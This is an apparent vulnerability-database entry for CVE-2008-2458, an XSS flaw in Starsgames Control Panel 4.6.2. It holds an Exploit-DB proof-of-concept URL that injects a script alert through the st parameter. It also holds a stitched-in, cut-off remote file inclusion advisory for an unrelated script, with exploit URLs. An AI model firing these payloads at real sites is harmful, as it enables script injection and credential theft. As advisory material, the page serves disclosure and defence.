CVE-2008-2458
Published 2008-05-27
Priority: P4 17 | Severity: medium | CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.47% (70.4th percentile)
Cross-site scripting (XSS) vulnerability in index.php in Starsgames Control Panel 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the st parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 4shared | starsgames_control_panel | <= 4.6.2 | — |
No detection rules found.
Exploit-DB
Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting
exploitdb·2008-05-20
CVE-2008-2458 Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/29295/info
Starsgames Control Panel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showtopic=18&st= alert(/xss/)
http://www.example.com/index.php?showtopic=18&st=
Exploit-DB
Kostenloses Linkmanagementscript - Remote File Inclusion
exploitdb·2008-05-14
CVE-2008-2270 Kostenloses Linkmanagementscript - Remote File Inclusion
---
############################################
# Remote File Inclusion Vulnerability #
# Kostenloses Linkmanagementscript #
############################################
## Author : HaCkeR_EgY
## C0NTACT : [email protected]
## H^OME : www.PAL-HaCkeR.com & ATSDP.COM
## Scripte Name : Kostenloses Linkmanagementscript
## download scripte : http://scripte.phpway.de/
## Downloads: 2458
########################################################################
## VuRn C0DE :
Line 91 :
## ExPL0!T :
1=====>>http://www.target.de/script/template\index.php?main_page_directory= Ev!L C0dE
2=====>>http://www.target.de/script/template\index.php?page_to_include= Ev!L C0dE
## L!ve DeM0 :
=======>>http://scripte.phpway.de/demo/templ
No writeups or analysis indexed.
http://secunia.com/advisories/30321
http://www.securityfocus.com/archive/1/492264/100/0/threaded
http://www.securityfocus.com/bid/29295
https://exchange.xforce.ibmcloud.com/vulnerabilities/42544
2008-05-27
Published